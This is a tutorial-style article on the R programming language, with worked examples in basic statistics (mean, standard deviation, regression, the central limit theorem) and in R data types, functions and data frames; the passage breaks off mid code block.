Contributing editor, database programmer, and musician
R is a programming language for statistical computing, data visualization, and data analysis.
A numeric data set may have a central tendency: where some of the most typical data points reside.[1] The arithmetic mean (average) is the most commonly used measure of central tendency.[1] The mean of a numeric data set is the sum of the data points divided by the number of data points, $\bar{x} = \frac{1}{n}\sum_{i=1}^{n} x_i$.[1]
Suppose a sample of four observations of Celsius temperature measurements were taken 12 hours apart, yielding x = 30, 27, 31, and 28.
This R computer program will output the mean of x:
```r
# The c() function "combines" a list into a single object.
x <- c(30, 27, 31, 28)
sum <- sum(x)
length <- length(x)
mean <- sum / length
message("Mean:")
print(mean)
```
Note: R can have the same identifier represent both a function name and its result, because when an identifier is called as a function, R skips objects that are not functions. For more information, see scope.
Output:
```
Mean:
[1] 29
```
This R program will execute the native mean() function to output the mean of x:
```r
x <- c(30, 27, 31, 28)
message("Mean:")
print(mean(x))
```
Output:
```
Mean:
[1] 29
```
A standard deviation of a numeric data set indicates how far, on average, the data points lie from the mean.[2] For a data set with a small amount of variation, each data point will be close to the mean, so the standard deviation will be small.[2] The sample standard deviation is $s = \sqrt{\frac{\sum_{i=1}^{n}(x_i - \bar{x})^2}{n-1}}$.
Using the same four Celsius measurements, x = 30, 27, 31, and 28, this R program will output the standard deviation of x:
```r
x <- c(30, 27, 31, 28)
distanceFromMean <- x - mean(x)
distanceFromMeanSquared <- distanceFromMean^2
distanceFromMeanSquaredSum <- sum(distanceFromMeanSquared)
# Divide by n - 1 to obtain the sample variance
variance <- distanceFromMeanSquaredSum / (length(x) - 1)
standardDeviation <- sqrt(variance)
message("Standard deviation:")
print(standardDeviation)
```
Output:
```
Standard deviation:
[1] 1.825742
```
This R program will execute the native sd() function to output the standard deviation of x:
```r
x <- c(30, 27, 31, 28)
message("Standard deviation:")
print(sd(x))
```
Output:
```
Standard deviation:
[1] 1.825742
```
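The sd() function divides by n - 1, which gives the sample standard deviation. Dividing by n gives the population standard deviation instead. This sketch reuses the four measurements and computes both values so you can see the difference:

```r
x <- c(30, 27, 31, 28)
squaredDistanceSum <- sum((x - mean(x))^2)   # 1 + 4 + 4 + 1 = 10

sampleSd <- sqrt(squaredDistanceSum / (length(x) - 1))   # divide by n - 1
populationSd <- sqrt(squaredDistanceSum / length(x))     # divide by n

print(sampleSd)       # 1.825742, the same value sd(x) returns
print(populationSd)   # 1.581139
```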

A phenomenon may be the result of one or more observable events. For example, the phenomenon of skiing accidents may be the result of having snow in the mountains. A method to measure whether or not a numeric data set is related to another data set is linear regression.[4]
If a linear relationship exists, then a scatter plot of the two data sets will show a pattern that resembles a straight line.[5] If a straight line is embedded into the scatter plot such that the sum of the squared vertical distances from the points to the line is minimal, then the line is called a regression line (or least-squares line). The equation of the regression line is called the regression equation.[6]
The regression equation is a linear equation; therefore, it has a slope and a y-intercept. The format of the regression equation is $\hat{y} = b_0 + b_1 x$, where $b_1$ is the slope and $b_0$ is the y-intercept.[7][a]
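Write the regression equation as $\hat{y} = b_0 + b_1 x$. The least-squares slope and y-intercept can then be expressed with the sample means $\bar{x}$ and $\bar{y}$. These are the numerator, denominator, and intercept that the hand-built R program for the temperature data computes step by step:

$$
b_1 = \frac{\sum_{i=1}^{n} (x_i - \bar{x})(y_i - \bar{y})}{\sum_{i=1}^{n} (x_i - \bar{x})^2},
\qquad
b_0 = \bar{y} - b_1 \bar{x}
$$

For the temperature data, $\bar{x} = 29$ and $\bar{y} = 84.2$. The numerator is $18$ and the denominator is $10$, so $b_1 = 1.8$ and $b_0 = 84.2 - 1.8 \times 29 = 32$.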
Suppose the four Celsius measurements x = 30, 27, 31, and 28 were taken 12 hours apart. At the same time, the thermometer was switched to Fahrenheit temperature and another measurement was taken, yielding y = 86.0, 80.6, 87.8, and 82.4.
This R program will output the slope and y-intercept of a linear relationship in which y depends upon x:
```r
x <- c(30, 27, 31, 28)
y <- c(86.0, 80.6, 87.8, 82.4)
# Build the numerator
independentDistanceFromMean <- x - mean(x)
sampledDependentDistanceFromMean <- y - mean(y)
independentDistanceTimesSampledDistance <- independentDistanceFromMean * sampledDependentDistanceFromMean
independentDistanceTimesSampledDistanceSum <- sum(independentDistanceTimesSampledDistance)
# Build the denominator
independentDistanceFromMeanSquared <- independentDistanceFromMean^2
independentDistanceFromMeanSquaredSum <- sum(independentDistanceFromMeanSquared)
# Slope is rise over run
slope <- independentDistanceTimesSampledDistanceSum / independentDistanceFromMeanSquaredSum
yIntercept <- mean(y) - slope * (mean(x))
message("Slope:")
print(slope)
message("Y-intercept:")
print(yIntercept)
```
Output:
```
Slope:
[1] 1.8
Y-intercept:
[1] 32
```
This R program will execute the native functions to output the slope and y-intercept:
```r
x <- c(30, 27, 31, 28)
y <- c(86.0, 80.6, 87.8, 82.4)
# Execute lm() with Fahrenheit depends upon Celsius
linearModel <- lm(y ~ x)
# coefficients() returns a structure containing the slope and y intercept
coefficients <- coefficients(linearModel)
# Extract the slope from the structure
slope <- coefficients[["x"]]
# Extract the y intercept from the structure
yIntercept <- coefficients[["(Intercept)"]]
message("Slope:")
print(slope)
message("Y-intercept:")
print(yIntercept)
```
Output:
```
Slope:
[1] 1.8
Y-intercept:
[1] 32
```
The coefficient of determination measures the proportion of the variation in the dependent variable that is explained by the independent variable.[8] It always lies between 0 and 1.[9] A value of 0 indicates no linear relationship between the two data sets, and a value near 1 indicates the regression equation is extremely useful for making predictions.[10] It can be computed as $r^2 = \frac{\sum_{i=1}^{n}(\hat{y}_i - \bar{y})^2}{\sum_{i=1}^{n}(y_i - \bar{y})^2}$.
This R program will output the coefficient of determination of the linear relationship between x and y:
```r
x <- c(30, 27, 31, 28)
y <- c(86.0, 80.6, 87.8, 82.4)
# Build the numerator
linearModel <- lm(y ~ x)
coefficients <- coefficients(linearModel)
slope <- coefficients[["x"]]
yIntercept <- coefficients[["(Intercept)"]]
predictedResponse <- yIntercept + (slope * x)
predictedResponseDistanceFromMean <- predictedResponse - mean(y)
predictedResponseDistanceFromMeanSquared <- predictedResponseDistanceFromMean^2
predictedResponseDistanceFromMeanSquaredSum <- sum(predictedResponseDistanceFromMeanSquared)
# Build the denominator
sampledResponseDistanceFromMean <- y - mean(y)
sampledResponseDistanceFromMeanSquared <- sampledResponseDistanceFromMean^2
sampledResponseDistanceFromMeanSquaredSum <- sum(sampledResponseDistanceFromMeanSquared)
coefficientOfDetermination <- predictedResponseDistanceFromMeanSquaredSum / sampledResponseDistanceFromMeanSquaredSum
message("Coefficient of determination:")
print(coefficientOfDetermination)
```
Output:
```
Coefficient of determination:
[1] 1
```
This R program will execute the native functions to output the coefficient of determination:
```r
x <- c(30, 27, 31, 28)
y <- c(86.0, 80.6, 87.8, 82.4)
linearModel <- lm(y ~ x)
summary <- summary(linearModel)
coefficientOfDetermination <- summary[["r.squared"]]
message("Coefficient of determination:")
print(coefficientOfDetermination)
```
Output:[b]
```
Coefficient of determination:
[1] 1
```
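In simple linear regression (a single independent variable), the coefficient of determination equals the square of the Pearson correlation coefficient between x and y. This sketch checks that identity with base R's cor(). The vector yNoisy is hypothetical, made up so that the points do not fall exactly on a line and the value comes out below 1:

```r
x <- c(30, 27, 31, 28)
y <- c(86.0, 80.6, 87.8, 82.4)
# Fahrenheit is an exact linear function of Celsius, so this is 1
print(cor(x, y)^2)

# Hypothetical noisy responses for comparison
yNoisy <- c(85.0, 81.5, 87.0, 83.5)
rSquaredFromCor <- cor(x, yNoisy)^2
rSquaredFromLm <- summary(lm(yNoisy ~ x))[["r.squared"]]
print(rSquaredFromCor)
print(all.equal(rSquaredFromCor, rSquaredFromLm))   # TRUE
```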
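This R program will display a scatter plot with an embedded regression line and regression equation illustrating the relationship between x and y:
```r
x <- c(30, 27, 31, 28)
y <- c(86.0, 80.6, 87.8, 82.4)
linearModel <- lm(y ~ x)
coefficients <- coefficients(linearModel)
slope <- coefficients[["x"]]
intercept <- coefficients[["(Intercept)"]]
# Execute paste() to build the regression equation string.
# round() keeps floating point noise out of the label.
regressionEquation <- paste("y =", round(intercept, 2), "+", round(slope, 2), "x")
# Display a scatter plot with the regression equation as its subtitle
plot(x, y,
     main = "Fahrenheit Depends Upon Celsius",
     sub = regressionEquation,
     xlab = "Degrees Celsius",
     ylab = "Degrees Fahrenheit")
# Draw the regression line on top of the existing plot
abline(linearModel)
```
Output: a scatter plot of the four measurements, with the regression line drawn through them and the regression equation as the subtitle.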
R is an interpreted language, so programmers typically access it through a command-line interpreter. If a programmer types 1+1 at the R command prompt and presses Enter, the computer replies with 2.[11] Programmers also save R programs to a file and then execute them with the batch interpreter Rscript.[12]
R stores data inside an object. An object is assigned a name, which the computer program uses to set and retrieve a value.[13] An object is created by placing its name to the left of the symbol-pair <-.[14] The symbol-pair <- is called the assignment operator.[15]
To create an object named x and assign it the integer value 82:
```r
x <- 82L
print(x)
```
Output:
```
[1] 82
```
The [1] displayed before the number is a subscript. It shows that this integer is stored at index one of a vector.
The most primitive R object is the vector.[16] A vector is a one-dimensional array of data. To assign multiple elements to the array, use the c() function to "combine" the elements. The elements must be the same data type; when they are not, c() coerces them to a common type.[17] R lacks scalar data types, which hold a single word of memory, usually an integer. Instead, a single integer is stored as the first element of a vector of length one. The single integer is retrieved using the index subscript [1].[c]
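This short sketch shows both points using only base R. A single number is a vector of length one. When c() receives mixed types, it converts them to one common type: an integer is promoted to double, and numbers are promoted to character.

```r
# A single integer is a vector of length one, not a scalar.
single <- 82L
print(length(single))        # 1
print(single[1])             # 82

# c() coerces mixed inputs to a single common type.
mixedNumbers <- c(1L, 2.5)
print(typeof(mixedNumbers))  # "double"
mixedText <- c(1L, "two")
print(mixedText)             # "1" "two"
print(typeof(mixedText))     # "character"
```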
R program to store and retrieve a single integer:
```r
store <- 82L
retrieve <- store[1]
print(retrieve[1])
```
Output:
```
[1] 82
```
When an operation is applied to a vector, R will apply the operation to each element in the array. This is called an element-wise operation.[18]
This example creates the object named x and assigns it the integers 1 through 3. The object is displayed, and then displayed again with one added to each element:
```r
x <- 1:3
print(x)
print(x + 1)
```
Output:
```
[1] 1 2 3
[1] 2 3 4
```
To achieve the many additions, R implements vector recycling.[18] The numeral one following the plus sign (+) is a vector of length one, so R recycles it into an internal array of three ones. The + operation then loops through both arrays and performs the addition on each element pair. The results are stored in another internal array of three elements, which is returned to the print() function.
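Recycling also works with vectors longer than one element. In this sketch, the shorter vector c(10, 20) is reused from its beginning until it covers all six elements. When the longer length is not a multiple of the shorter length, R still recycles but issues a warning. suppressWarnings() is used here only to keep the sketch's output quiet:

```r
x <- 1:6
# c(10, 20) is recycled as 10, 20, 10, 20, 10, 20
print(x + c(10, 20))       # 11 22 13 24 15 26

# 5 is not a multiple of 2, so R recycles and would normally warn
uneven <- suppressWarnings(1:5 + c(10, 20))
print(uneven)              # 11 22 13 24 15
```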
A numeric vector is used to store integers and floating point numbers.[19] The primary characteristic of a numeric vector is the ability to perform arithmetic on the elements.[19]
By default, whole numbers (numbers without a decimal point) are stored as floating point. To force integer memory allocation, append an L to the number. As an exception, the sequence operator : will, by default, allocate integer memory.
R program:
```r
x <- 82L
print(x[1])
message("Data type:")
typeof(x)
```
Output:
```
[1] 82
Data type:
[1] "integer"
```
R program:
```r
x <- c(1L, 2L, 3L)
print(x)
message("Data type:")
typeof(x)
```
Output:
```
[1] 1 2 3
Data type:
[1] "integer"
```
R program:
```r
x <- 1:3
print(x)
message("Data type:")
typeof(x)
```
Output:
```
[1] 1 2 3
Data type:
[1] "integer"
```
A double vector stores real numbers as floating point numbers. The memory allocation for a floating point number is double precision.[19] Double precision is the default memory allocation for numbers with or without a decimal point.
R program:
```r
x <- 82
print(x[1])
message("Data type:")
typeof(x)
```
Output:
```
[1] 82
Data type:
[1] "double"
```
R program:
```r
x <- c(1, 2, 3)
print(x)
message("Data type:")
typeof(x)
```
Output:
```
[1] 1 2 3
Data type:
[1] "double"
```
A logical vector stores binary data: either TRUE or FALSE. The purpose of this vector is to store the result of a comparison.[20] A logical datum is expressed as TRUE, T, FALSE, or F.[20] The capital letters are required, and no quotes surround the constants.[20] Unlike TRUE and FALSE, T and F are ordinary variables that can be reassigned, so TRUE and FALSE are the safer spellings.
R program:
```r
x <- 3 < 4
print(x[1])
message("Data type:")
typeof(x)
```
Output:
```
[1] TRUE
Data type:
[1] "logical"
```
Two vectors may be compared element by element using the following relational (comparison) operators:[21]
| Operator | Syntax | Tests |
|---|---|---|
| > | a > b | Is a greater than b? |
| >= | a >= b | Is a greater than or equal to b? |
| < | a < b | Is a less than b? |
| <= | a <= b | Is a less than or equal to b? |
| == | a == b | Is a equal to b? |
| != | a != b | Is a not equal to b? |
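These operators work element by element. Comparing two vectors of the same length therefore returns a logical vector with one result per element pair. Here is a small sketch with made-up vectors a and b:

```r
a <- c(1, 5, 3)
b <- c(2, 2, 3)
print(a > b)    # FALSE  TRUE FALSE
print(a >= b)   # FALSE  TRUE  TRUE
print(a == b)   # FALSE FALSE  TRUE
print(a != b)   #  TRUE  TRUE FALSE
```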
A character vector stores character strings.[22] Strings are created by surrounding text in double quotation marks.[22]
R program:
```r
x <- "hello world"
print(x[1])
message("Data type:")
typeof(x)
```
Output:
```
[1] "hello world"
Data type:
[1] "character"
```
R program:
```r
x <- c("hello", "world")
print(x)
message("Data type:")
typeof(x)
```
Output:
```
[1] "hello" "world"
Data type:
[1] "character"
```
A factor is a vector that stores a categorical variable.[23] The factor() function converts a character vector into an enumerated type. Each distinct value becomes a level, and each element is stored as the integer code of its level.[24]
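You can inspect the integer storage directly. In this sketch the water values are made up for illustration. The levels argument fixes the order of the categories, so "none" gets code 1, "light" gets code 2, and "medium" gets code 3:

```r
waterObserved <- c("light", "none", "medium", "light")
waterFactor <- factor(waterObserved, levels = c("none", "light", "medium"))
print(levels(waterFactor))      # "none"   "light"  "medium"
print(as.integer(waterFactor))  # 2 1 3 2
print(typeof(waterFactor))      # "integer"
print(class(waterFactor))       # "factor"
```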
In experimental design, a factor is an independent variable to test (an input) in a controlled experiment.[25] A controlled experiment is used to establish causation, not just association.[26] For example, one could notice that an increase in hot chocolate sales is associated with an increase in skiing accidents. Yet buying hot chocolate does not cause skiing accidents; both tend to rise during cold, snowy weather.
An experimental unit is an item that an experiment is being performed upon. If the experimental unit is a person, then it is known as a subject. A response variable (also known as a dependent variable) is a possible outcome from an experiment. A factor level is a characteristic of a factor. A treatment is an environment consisting of a combination of one level (characteristic) from each of the input factors. A replicate is the execution of a treatment on an experimental unit, which yields response variables.[27]
This example builds two R programs to model an experiment to increase the growth of a species of cactus. Two factors are tested: the water level (none, light, or medium) and whether a polymer is used (notUsed or used).
R program to set up the design:
```r
# Step 1 is to establish the levels of a factor.
# Vector of the water levels:
waterLevel <- c("none", "light", "medium")
# Step 2 is to create the factor.
# Vector of the water factor:
waterFactor <- factor(
  # Although a subset is possible, use all of the levels.
  waterLevel,
  levels = waterLevel
)
# Vector of the polymer levels:
polymerLevel <- c("notUsed", "used")
# Vector of the polymer factor:
polymerFactor <- factor(polymerLevel, levels = polymerLevel)
# The treatments are the Cartesian product of both factors.
treatmentCartesianProduct <- expand.grid(waterFactor, polymerFactor)
message("Water factor:")
print(waterFactor)
message("\nPolymer factor:")
print(polymerFactor)
message("\nTreatment Cartesian product:")
print(treatmentCartesianProduct)
```
Output:
```
Water factor:
[1] none   light  medium
Levels: none light medium

Polymer factor:
[1] notUsed used
Levels: notUsed used

Treatment Cartesian product:
    Var1    Var2
1   none notUsed
2  light notUsed
3 medium notUsed
4   none    used
5  light    used
6 medium    used
```
R program to store and display the results:
```r
experimentalUnit <- c("cactus1", "cactus2", "cactus3")
replicateWater <- c("none", "light", "medium")
replicatePolymer <- c("notUsed", "used", "notUsed")
replicateInches <- c(82L, 83L, 84L)
response <- data.frame(experimentalUnit, replicateWater, replicatePolymer, replicateInches)
print(response)
```
Output:
```
  experimentalUnit replicateWater replicatePolymer replicateInches
1          cactus1           none          notUsed              82
2          cactus2          light             used              83
3          cactus3         medium          notUsed              84
```
A data frame stores data in two dimensions, like a table.[28] Horizontally, it is a list of column vectors; vertically, it is a sequence of rows. It is the most useful structure for data analysis.[29] Data frames are created using the data.frame() function. The input is a list of vectors of equal length, each of any data type. Each vector becomes a column in a table. The elements in each vector are aligned to form the rows in the table.
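Here is a brief sketch of working with both dimensions of a small made-up data frame. dim() reports the number of rows and columns, and [row, column] selects a single cell. data.frame() refuses columns whose lengths cannot be aligned into rows; the error is caught here so the sketch keeps running:

```r
dataFrame <- data.frame(integer = c(82L, 83L), string = c("hello", "world"))
print(dim(dataFrame))            # 2 2 (rows, columns)
print(dataFrame[2, "string"])    # "world"
print(dataFrame[1, ])            # first row, as a one-row data frame

# Columns of length 2 and 3 cannot be aligned into rows, so this fails.
result <- tryCatch(
  data.frame(a = 1:2, b = 1:3),
  error = function(e) conditionMessage(e)
)
print(result)
```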
R program:
```r
integer <- c(82L, 83L)
string <- c("hello", "world")
# Name the result dataFrame so it does not mask the data.frame() function
dataFrame <- data.frame(integer, string)
print(dataFrame)
message("Data type:")
class(dataFrame)
```
Output:
```
  integer string
1      82  hello
2      83  world
Data type:
[1] "data.frame"
```
A column can be extracted from a data frame by placing its name, as a string, between double brackets. This returns the original vector. Each element in the returned vector can be accessed by its index number.
R program to extract the word "world", which is stored in the second element of the "string" vector:
```r
integer <- c(82L, 83L)
string <- c("hello", "world")
dataFrame <- data.frame(integer, string)
vector <- dataFrame[["string"]]
print(vector[2])
message("Data type:")
typeof(vector)
```
Output:
```
[1] "world"
Data type:
[1] "character"
```
Vectorized coding is a method to produce quality R computer programs that take advantage of R's strengths.[30] The R language is designed to be fast at logical testing, subsetting, and element-wise execution.[30] On the other hand, R does not have a fast for loop.[31] For example, R can search-and-replace faster using logical vectors than by using a for loop.[31]
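You can check this claim on your own machine by timing both approaches with system.time(). This sketch builds a made-up vector of 100,000 words and replaces "one" with "1" in two ways: first with a for loop, then with a logical index. It then confirms that both approaches give the same result. Timings depend on the machine, so none are shown:

```r
# Made-up data: 100,000 words drawn from three choices.
set.seed(1)
words <- sample(c("one", "two", "three"), size = 1e5, replace = TRUE)

# Approach 1: a for loop that visits one element at a time.
loopTime <- system.time({
  loopResult <- words
  for (i in seq_along(loopResult)) {
    if (loopResult[i] == "one") {
      loopResult[i] <- "1"
    }
  }
})

# Approach 2: a logical vector used as an index.
vectorTime <- system.time({
  vectorResult <- words
  vectorResult[vectorResult == "one"] <- "1"
})

print(identical(loopResult, vectorResult))  # TRUE
print(loopTime[["elapsed"]])    # seconds for the loop
print(vectorTime[["elapsed"]])  # seconds for the vectorized version
```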
A for loop repeats a block of code for a specific number of iterations.[32]
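Example to search-and-replace using a for loop:
```r
vector <- c("one", "two", "three")
# seq_along() yields 1, 2, 3 here, and no iterations for an empty vector
for (i in seq_along(vector)) {
  if (vector[i] == "one") {
    vector[i] <- "1"
  }
}
message("Replaced vector:")
print(vector)
```
Output:
```
Replaced vector:
[1] "1"     "two"   "three"
```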
R's syntax allows a logical vector to be used as an index to a vector.[33] This method is called subsetting.[34]
R example:
```r
vector <- c("one", "two", "three")
print(vector[c(TRUE, FALSE, TRUE)])
```
Output:
```
[1] "one"   "three"
```
R allows the assignment operator <- to overwrite an existing value in a vector by using an index number.[15]
R example:
```r
vector <- c("one", "two", "three")
vector[1] <- "1"
print(vector)
```
Output:
```
[1] "1"     "two"   "three"
```
R also allows the assignment operator <- to overwrite an existing value in a vector by using a logical vector.
R example:
```r
vector <- c("one", "two", "three")
vector[c(TRUE, FALSE, FALSE)] <- "1"
print(vector)
```
Output:
```
[1] "1"     "two"   "three"
```
Because a logical vector may be used as an index, and because a comparison operator returns a logical vector, a search-and-replace can take place without a for loop.
R example:
```r
vector <- c("one", "two", "three")
vector[vector == "one"] <- "1"
print(vector)
```
Output:
```
[1] "1"     "two"   "three"
```
A function is an object that stores computer code instead of data.[35] The purpose of storing code inside a function is to be able to reuse it in another context.[35]
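R comes with over 1,000 native functions to perform common tasks.[36] To execute a function, type its name followed by its input data enclosed in parentheses, as in functionName(data).
This example rolls a die one time. The native function's name is sample(). The data to be processed are the six faces of the die, 1:6, and the size parameter, which instructs sample() to perform the roll one time:
```r
sample(1:6, size = 1)
```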
Possible output:
```
[1] 6
```
The R interpreter provides a help screen for each native function. The help screen is displayed after typing a question mark followed by the function's name:
```r
?sample
```
Partial output:
```
Description:
     ‘sample’ takes a sample of the specified size from the elements of
     ‘x’ using either with or without replacement.
Usage:
     sample(x, size, replace = FALSE, prob = NULL)
```
The sample() function has four input parameters. Input parameters are pieces of information that control the function's behavior. Input parameters may be communicated to the function in a combination of three ways: by position, by name (name = data), or by omission, in which case the parameter's default value is used.
For example, each of these calls to sample() will roll a die one time:
```r
sample(1:6, 1, F, NULL)
sample(1:6, 1)
sample(1:6, size = 1)
sample(size = 1, x = 1:6)
```
Every input parameter has a name.[37] If a function has many parameters, setting name = data will make the source code more readable.[38] If the parameter's name is omitted, R will match the data in the position order.[38] Usually, parameters that are rarely used will have a default value and may be omitted.
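The three ways of passing input also apply to functions you write yourself. The sketch below uses a hypothetical rectangleArea() function whose height parameter has a default value of 1:

```r
# Hypothetical helper for illustration; height defaults to 1.
rectangleArea <- function(width, height = 1) {
  width * height
}

byPosition <- rectangleArea(3, 2)               # width = 3, height = 2
byName <- rectangleArea(height = 2, width = 3)  # names allow any order
byDefault <- rectangleArea(3)                   # height omitted, so 1 is used
print(c(byPosition, byName, byDefault))         # 6 6 3
```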
The output from a function may become the input to another function. This is the basis for data coupling.[39]
This example executes the function sample() and sends the result to the function sum(). It simulates the roll of two dice and adds them up:
```r
sum(sample(1:6, size = 2, replace = TRUE))
```
Possible output:
```
[1] 7
```
A function typically uses its parameters to input data. Alternatively, a function (A) can use a parameter to input another function (B). Function (A) then takes responsibility for executing function (B).
For example, the function replicate() has an input parameter, expr, that holds an expression such as a call to another function; replicate() evaluates that expression repeatedly. This example will execute replicate() once, and replicate() will execute sample() five times. It will simulate rolling a die five times:
```r
replicate(5, sample(1:6, size = 1))
```
Possible output:
```
[1] 2 4 1 4 5
```
Because each face of a die is equally likely to appear on top, the results of rolling a die many times follow a uniform distribution.[40] This example displays a histogram of a die rolled 10,000 times:
```r
hist(replicate(10000, sample(1:6, size = 1)))
```
The resulting histogram is likely to have a flat top.

A numeric data set may have a central tendency, but it also may not have one. Nonetheless, the arithmetic means of many samples will cluster around the population's mean. The arithmetic mean of a sample is called the sample mean.[41] The central limit theorem states that, for a sample size of 30 or more (a common rule of thumb), the distribution of the sample mean ($\bar{x}$) is approximately normal, regardless of the distribution of the variable under consideration ($x$).[42] A histogram displaying the frequency of many sample means will therefore resemble a bell-shaped curve.
For example, rolling one die many times generates a uniform distribution. Nonetheless, rolling 30 dice, calculating their average ($\bar{x}$), and repeating this over and over again generates an approximately normal distribution.
R program to roll 30 dice 10,000 times and plot the frequency of averages:
```r
hist(replicate(10000, mean(sample(1:6, size = 30, replace = TRUE))))
```
The resulting histogram is likely to have a bell shape.
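The central limit theorem also predicts how spread out the sample means are. Their standard deviation should be close to $\sigma / \sqrt{n}$, where $\sigma$ is the standard deviation of a single die roll and $n = 30$. For a fair die, $\sigma = \sqrt{35/12} \approx 1.708$, so the prediction is about 0.312. This sketch checks the prediction by simulation. set.seed() is used only to make the run repeatable; other seeds give slightly different simulated values:

```r
set.seed(42)
sampleMeans <- replicate(10000, mean(sample(1:6, size = 30, replace = TRUE)))

# Population standard deviation of one fair die (divide by N, not N - 1).
faces <- 1:6
sigma <- sqrt(mean((faces - mean(faces))^2))
predictedSpread <- sigma / sqrt(30)

message("Mean of the sample means (expected to be near 3.5):")
print(mean(sampleMeans))
message("Predicted standard deviation of the sample means:")
print(predictedSpread)
message("Simulated standard deviation of the sample means:")
print(sd(sampleMeans))
```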

To create a function object, execute the function() statement and assign the result to a name.[43] A function receives input both from global variables and from input parameters (often called arguments). Objects created within the function body remain local to the function.
R program to create a function:
```r
# The input parameters are x and y.
# The return value is a numeric double vector.
f <- function(x, y) {
  first_expression <- x * 2
  second_expression <- y * 3
  first_expression + second_expression
  # The return statement may be omitted
  # if the last expression is unassigned.
  # This will save a few clock cycles.
}
```
Usage output:
```
> f(1, 2)
[1] 8
```
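Function arguments are passed in by value: a function works on its own copy of each argument, so modifying an argument inside the function does not change the caller's object. Internally, R copies an object only when it is modified.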
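The following minimal sketch demonstrates this behavior with a hypothetical addOne() function. The function changes its own copy of the argument, and the caller's vector stays the same:

```r
# Hypothetical function for illustration.
addOne <- function(v) {
  v[1] <- v[1] + 1  # modifies the function's local copy only
  v
}
original <- c(10, 20)
changed <- addOne(original)
print(original)  # 10 20 (unchanged)
print(changed)   # 11 20
```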
R supports generic functions, which are a form of polymorphism. Generic functions act differently depending on the class of the argument passed in. The process is to dispatch the method specific to the class. A common implementation is R's print() function, which can print almost every class of object, for example, print(objectName).[44]
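The sketch below shows how dispatch works in R's S3 object system. A generic function calls UseMethod(). R then looks for a method named generic.class and falls back to generic.default when no class-specific method exists. The describe() generic and the temperature class are hypothetical names chosen for illustration. print.temperature() adds a method to the existing print() generic:

```r
# A hypothetical generic function and its methods.
describe <- function(x) UseMethod("describe")
describe.default <- function(x) "something else"
describe.numeric <- function(x) "a number"
describe.character <- function(x) "a string"

print(describe(82))     # "a number"
print(describe("hi"))   # "a string"
print(describe(TRUE))   # "something else"

# A print() method for a hypothetical "temperature" class.
print.temperature <- function(x, ...) {
  cat(unclass(x), "degrees Celsius\n")
  invisible(x)
}
reading <- structure(29, class = "temperature")
print(reading)          # 29 degrees Celsius
```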
R program illustrating if statements:
```r
minimum <- function(a, b) {
  if (a < b)
    minimum <- a
  else
    minimum <- b
  return(minimum)
}
maximum <- function(a, b) {
  if (a > b)
    maximum <- a
  else
    maximum <- b
  return(maximum)
}
# Note: this definition masks base R's own range() function.
range <- function(a, b, c) {
  range <- maximum(a, maximum(b, c)) - minimum(a, minimum(b, c))
  return(range)
}
range(10, 4, 7)
```
Output:
```
[1] 6
```
R provides three notable shortcuts to programmers.
If an object is present on a line by itself at the top level, then the interpreter will send the object to the print() function.[45]
R example:
```r
integer <- 82L
integer
```
Output:
```
[1] 82
```
If a programmer-created function omits the return() statement, then the function returns the value of the last expression it evaluates.[46]
R example:
```r
f <- function() {
  # Don't assign the expression to an object.
  82L + 1L
}
```
Usage output:
```
> f()
[1] 83
```
The symbol-pair <- assigns a value to an object.[15] Alternatively, = may be used as the assignment operator. However, care must be taken because = closely resembles the comparison operator for equality, which is ==.[47]
R example:
```r
integer = 82L
print(integer)
```
Output:
```
[1] 82
```
If a numeric data set has a central tendency, it also may have a symmetric-looking histogram, with a shape that resembles a bell. If a data set has an approximately bell-shaped histogram, it is said to have a normal distribution.[48]
In 1817, a Scottish army contractor measured the chest sizes of 5,732 members of a militia unit. The frequency of each size was:[49]
| Chest size (inches) | Frequency |
|---|---|
| 33 | 3 |
| 34 | 19 |
| 35 | 81 |
| 36 | 189 |
| 37 | 409 |
| 38 | 753 |
| 39 | 1062 |
| 40 | 1082 |
| 41 | 935 |
| 42 | 646 |
| 43 | 313 |
| 44 | 168 |
| 45 | 50 |
| 46 | 18 |
| 47 | 3 |
| 48 | 1 |
R has the write.csv() function to convert a data frame into a CSV file.
R program to create chestsize.csv:
```r
chestsize <- c(33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48)
frequency <- c(3, 19, 81, 189, 409, 753, 1062, 1082, 935, 646, 313, 168, 50, 18, 3, 1)
dataFrame <- data.frame(chestsize, frequency)
write.csv(dataFrame,
          file = "chestsize.csv",
          # By default, write.csv() writes the row numbers as the first column.
          row.names = FALSE)
```
The first step in data science is to import a data set.[50]
R program to import chestsize.csv into a data frame:
```r
dataFrame <- read.csv("chestsize.csv")
print(dataFrame)
```
Output:
```
   chestsize frequency
1         33         3
2         34        19
3         35        81
4         36       189
5         37       409
6         38       753
7         39      1062
8         40      1082
9         41       935
10        42       646
11        43       313
12        44       168
13        45        50
14        46        18
15        47         3
16        48         1
```
The second step in data science is to transform the data into a format that the functions expect.[50] The chest-size data set is summarized as a frequency table. However, R's statistical functions, such as mean(), sd(), and hist(), expect a numeric vector with one element per measurement.
R function to convert a data frame summarized as frequencies into a vector:
```r
# Filename: frequencyDataFrameToVector.R
frequencyDataFrameToVector <- function(dataFrame, dataColumnName, frequencyColumnName = "frequency") {
  dataVector <- dataFrame[[dataColumnName]]
  frequencyVector <- dataFrame[[frequencyColumnName]]
  vectorIndex <- 1
  frequencyIndex <- 1
  vector <- NA
  for (datum in dataVector) {
    frequency <- frequencyVector[frequencyIndex]
    # seq_len() skips the loop when a frequency is 0 (1:0 would run twice)
    for (i in seq_len(frequency)) {
      vector[vectorIndex] <- datum
      vectorIndex <- vectorIndex + 1
    }
    frequencyIndex <- frequencyIndex + 1
  }
  return(vector)
}
```
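Because R favors vectorized code, base R's rep() can probably do the same conversion. Its times argument repeats each element of its first argument the given number of times. This sketch enters the chest-size table directly instead of reading chestsize.csv. It also shows weighted.mean(), which computes the mean straight from the frequency table without expanding it:

```r
chestsize <- c(33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48)
frequency <- c(3, 19, 81, 189, 409, 753, 1062, 1082, 935, 646, 313, 168, 50, 18, 3, 1)

# Repeat each chest size as many times as it was observed.
chestSizeVector <- rep(chestsize, times = frequency)
print(length(chestSizeVector))   # 5732
print(head(chestSizeVector))     # 33 33 33 34 34 34
print(mean(chestSizeVector))     # 39.84892

# The same mean, computed from the frequency table directly.
print(weighted.mean(chestsize, w = frequency))
```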
R has the source() function to include another R source file into the current program.
R program to load and display a summary of the 5,732-member data set:
```r
source("frequencyDataFrameToVector.R")
dataFrame <- read.csv("chestsize.csv")
chestSizeVector <- frequencyDataFrameToVector(dataFrame, "chestsize")
message("Head:")
head(chestSizeVector)
message("\nTail:")
tail(chestSizeVector)
